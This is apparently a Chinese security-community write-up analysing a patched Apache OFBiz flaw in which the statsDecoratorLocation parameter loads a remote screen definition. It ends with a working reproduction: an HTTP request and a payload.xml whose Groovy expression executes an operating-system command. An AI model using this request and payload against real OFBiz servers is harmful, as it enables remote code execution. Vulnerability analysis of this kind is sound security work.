|
|
<p>漏洞的修复issue在:<a href=https://github.com/apache/ofbiz-framework/commit/ffb1bc487983fa672ac4fbeccf7ed7175e2accd3 target=_blank>https://github.com/apache/ofbiz-framework/commit/ffb1bc487983fa672ac4fbeccf7ed7175e2accd3</a></p>
|
|||
|
|
<p>允许了远程加载文件来渲染screen,比如如下这个<code>screen</code>:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nt><screen</span> <span class=na>name=</span><span class=s>"StatsSinceStart"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><section></span>
|
|||
|
|
<span class=nt><actions></span>
|
|||
|
|
<span class=nt><set</span> <span class=na>field=</span><span class=s>"titleProperty"</span> <span class=na>value=</span><span class=s>"WebtoolsStatsMainPageTitle"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><set</span> <span class=na>field=</span><span class=s>"tabButtonItem"</span> <span class=na>value=</span><span class=s>"stats"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><script</span> <span class=na>location=</span><span class=s>"component://webtools/groovyScripts/stats/StatsSinceStart.groovy"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></actions></span>
|
|||
|
|
<span class=nt><widgets></span>
|
|||
|
|
<span class=nt><decorator-screen</span> <span class=na>name=</span><span class=s>"StatsDecorator"</span> <span class=na>location=</span><span class=s>"${parameters.statsDecoratorLocation}"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><decorator-section</span> <span class=na>name=</span><span class=s>"body"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><section></span>
|
|||
|
|
<span class=nt><widgets></span>
|
|||
|
|
<span class=nt><container</span> <span class=na>style=</span><span class=s>"page-title"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><label</span> <span class=na>text=</span><span class=s>"${uiLabelMap[titleProperty]}"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></container></span>
|
|||
|
|
<span class=nt><include-menu</span> <span class=na>name=</span><span class=s>"StatsSinceStart"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/Menus.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><label></span>${uiLabelMap.WebtoolsStatsCurrentTime} ${nowTimestamp}<span class=nt></label></span>
|
|||
|
|
<span class=nt><screenlet</span> <span class=na>title=</span><span class=s>"${uiLabelMap.WebtoolsStatsRequestStats}"</span> <span class=na>padded=</span><span class=s>"false"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><include-grid</span> <span class=na>name=</span><span class=s>"ListRequestStats"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/StatsForms.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></screenlet></span>
|
|||
|
|
<span class=nt><screenlet</span> <span class=na>title=</span><span class=s>"${uiLabelMap.WebtoolsStatsEventStats}"</span> <span class=na>padded=</span><span class=s>"false"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><include-grid</span> <span class=na>name=</span><span class=s>"ListEventStats"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/StatsForms.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></screenlet></span>
|
|||
|
|
<span class=nt><screenlet</span> <span class=na>title=</span><span class=s>"${uiLabelMap.WebtoolsStatsViewStats}"</span> <span class=na>padded=</span><span class=s>"false"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><include-grid</span> <span class=na>name=</span><span class=s>"ListViewStats"</span> <span class=na>location=</span><span class=s>"component://webtools/widget/StatsForms.xml"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></screenlet></span>
|
|||
|
|
<span class=nt></widgets></span>
|
|||
|
|
<span class=nt></section></span>
|
|||
|
|
<span class=nt></decorator-section></span>
|
|||
|
|
<span class=nt></decorator-screen></span>
|
|||
|
|
<span class=nt></widgets></span>
|
|||
|
|
<span class=nt></section></span>
|
|||
|
|
<span class=nt></screen></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>xml文件配置中有一段<code><decorator-screen name="StatsDecorator" location="${parameters.statsDecoratorLocation}"></code>,这里就是一个二次模板注入的问题,当程序加载到这个xml文件时候,会对上面这一段再次渲染一次,对应的代码如下:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kt>void</span> <span class=nf>renderWidgetString</span><span class=o>(</span><span class=n>Appendable</span> <span class=n>writer</span><span class=o>,</span> <span class=n>Map</span><span class=o><</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>></span> <span class=n>context</span><span class=o>,</span> <span class=n>ScreenStringRenderer</span> <span class=n>screenStringRenderer</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>GeneralException</span><span class=o>,</span> <span class=n>IOException</span> <span class=o>{</span>
|
|||
|
|
<span class=kt>boolean</span> <span class=n>condTrue</span> <span class=o>=</span> <span class=kc>true</span><span class=o>;</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>condition</span> <span class=o>!=</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(!</span><span class=k>this</span><span class=o>.</span><span class=na>condition</span><span class=o>.</span><span class=na>eval</span><span class=o>(</span><span class=n>context</span><span class=o>))</span> <span class=o>{</span>
|
|||
|
|
<span class=n>condTrue</span> <span class=o>=</span> <span class=kc>false</span><span class=o>;</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>condTrue</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>AbstractModelAction</span><span class=o>.</span><span class=na>runSubActions</span><span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>actions</span><span class=o>,</span> <span class=n>context</span><span class=o>);</span>
|
|||
|
|
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>screenStringRenderer</span><span class=o>.</span><span class=na>renderSectionBegin</span><span class=o>(</span><span class=n>writer</span><span class=o>,</span> <span class=n>context</span><span class=o>,</span> <span class=k>this</span><span class=o>);</span>
|
|||
|
|
|
|||
|
|
<span class=n>renderSubWidgetsString</span><span class=o>(</span><span class=k>this</span><span class=o>.</span><span class=na>subWidgets</span><span class=o>,</span> <span class=n>writer</span><span class=o>,</span> <span class=n>context</span><span class=o>,</span> <span class=n>screenStringRenderer</span><span class=o>);</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>其实全局搜索一下系统的<code><decorator-screen name="StatsDecorator" location="${parameters.statsDecoratorLocation}</code>类似结构,可以观察到绝大多数都是<code><decorator-screen name="main-decorator" location="${parameters.mainDecoratorLocation}"></code>,也就是<code>mainDecoratorLocation</code>这个参数,但这个参数利用不了,可以简单看一下context中<code>parameters</code>参数赋值的逻辑:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kd>static</span> <span class=n>Map</span><span class=o><</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>></span> <span class=nf>getCombinedMap</span><span class=o>(</span><span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>,</span> <span class=n>Set</span><span class=o><?</span> <span class=kd>extends</span> <span class=n>String</span><span class=o>></span> <span class=n>namesToSkip</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>Map</span><span class=o><</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>></span> <span class=n>combinedMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o><>();</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getParameterMap</span><span class=o>(</span><span class=n>request</span><span class=o>));</span> <span class=c1>// parameters override nothing</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getServletContextMap</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>namesToSkip</span><span class=o>));</span> <span class=c1>// bottom level application attributes</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getSessionMap</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>namesToSkip</span><span class=o>));</span> <span class=c1>// session overrides application</span>
|
|||
|
|
<span class=n>combinedMap</span><span class=o>.</span><span class=na>putAll</span><span class=o>(</span><span class=n>getAttributeMap</span><span class=o>(</span><span class=n>request</span><span class=o>));</span> <span class=c1>// attributes trump them all</span>
|
|||
|
|
|
|||
|
|
<span class=k>return</span> <span class=n>combinedMap</span><span class=o>;</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>由于<code>mainDecoratorLocation</code>在<code>web.xml</code>中定义了,所以在执行到第二个语句,也就是<code>combinedMap.putAll(getServletContextMap(request, namesToSkip));</code>的时候,会将请求参数中的<code>mainDecoratorLocation</code>给覆盖成默认值,因此不可控。</p>
|
|||
|
|
<p>最后复现如下:</p>
|
|||
|
|
<pre><code>POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
Cookie: JSESSIONID=64FB07C6F3A047C4B6760B23070A03C0.jvm1; OFBiz.Visitor=10000
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
|
|||
|
|
Sec-Ch-Ua-Mobile: ?0
|
|||
|
|
Sec-Ch-Ua-Platform: "macOS"
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
Sec-Fetch-Site: none
|
|||
|
|
Sec-Fetch-Mode: navigate
|
|||
|
|
Sec-Fetch-User: ?1
|
|||
|
|
Sec-Fetch-Dest: document
|
|||
|
|
Accept-Encoding: gzip, deflate, br
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
Priority: u=0, i
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 56
|
|||
|
|
|
|||
|
|
statsDecoratorLocation=http://127.0.0.1:8081/payload.xml</code></pre>
|
|||
|
|
<p><code>payload.xml</code>文件内容为:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=cp><?xml version="1.0" encoding="UTF-8"?></span>
|
|||
|
|
<span class=nt><screens</span> <span class=na>xmlns:xsi=</span><span class=s>"http://www.w3.org/2001/XMLSchema-instance"</span>
|
|||
|
|
<span class=na>xmlns=</span><span class=s>"http://ofbiz.apache.org/Widget-Screen"</span> <span class=na>xsi:schemaLocation=</span><span class=s>"http://ofbiz.apache.org/Widget-Screen"</span> <span class=err>http://ofbiz.apache.org/dtds/widget-screen.xsd"</span><span class=nt>></span>
|
|||
|
|
|
|||
|
|
<span class=nt><screen</span> <span class=na>name=</span><span class=s>"StatsDecorator"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><section></span>
|
|||
|
|
<span class=nt><actions></span>
|
|||
|
|
<span class=nt><set</span> <span class=na>field=</span><span class=s>"headerItem"</span> <span class=na>value=</span><span class=s>"${groovy:throw new Exception('open -a Calculator'.execute().text);}"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt><entity-one</span> <span class=na>entity-name=</span><span class=s>"FinAccount"</span> <span class=na>value-field=</span><span class=s>"finAccount"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></actions></span>
|
|||
|
|
<span class=nt></section></span>
|
|||
|
|
<span class=nt></screen></span>
|
|||
|
|
|
|||
|
|
<span class=nt></screens></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240909110145-d937bc8a-6e57-1.png><img src="data:image/png;base64,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
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=post-user-action style=margin-top:34px>
|
|||
|
|
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15569>
|
|||
|
|
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right" id=follow_topic data-pk=15569>
|
|||
|
|
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right">
|
|||
|
|
<span>
|
|||
|
|
|
|||
|
|
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<div class=clearfix></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=related-section>
|
|||
|
|
<div class=related-box>
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/15566 title=go_ssti风险><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>go_ssti风险</a></span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/15570 title="蓝凌EKP V16老版本 bypass dataxml.jsp Auth"><span class=related-label>下一篇:</span>蓝凌EKP V16老版本 bypa...</a></span>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
|
|||
|
|
<div class=modal-dialog>
|
|||
|
|
<div class=modal-content>
|
|||
|
|
<div class=modal-header>
|
|||
|
|
<h4 class=modal-title id=myModalLabel style=text-align:center>
|
|||
|
|
积分打赏
|
|||
|
|
</h4>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-body id=button-value>
|
|||
|
|
<div style=text-align:center>
|
|||
|
|
<div role=group>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
|
|||
|
|
1分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
|
|||
|
|
2分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
|
|||
|
|
5分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
<br>
|
|||
|
|
<div style=margin-top:20px>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
|
|||
|
|
8分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
|
|||
|
|
10分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
|
|||
|
|
20分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-footer id=confirm>
|
|||
|
|
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
|
|||
|
|
<button type=button class="btn btn-primary" id=reward_topic data-pk=15569>确定</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box">
|
|||
|
|
<ol class=breadcrumb>
|
|||
|
|
<li class=active>0 条回复</li>
|
|||
|
|
</ol>
|
|||
|
|
<div class="box-container post-container">
|
|||
|
|
|
|||
|
|
<ul>
|
|||
|
|
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
|
|||
|
|
</ul>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box" id=reply-box>
|
|||
|
|
|
|||
|
|
<div class="box-container clearfix">
|
|||
|
|
|
|||
|
|
<div class=reminder>
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15569&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer class=bs-docs-footer>
|
|||
|
|
<div class="container text-center">
|
|||
|
|
<div class=links>
|
|||
|
|
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
|
|||
|
|
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
|
|||
|
|
<a href=https://xz.aliyun.com/connection>联系我们</a>
|
|||
|
|
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
|
|||
|
|
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|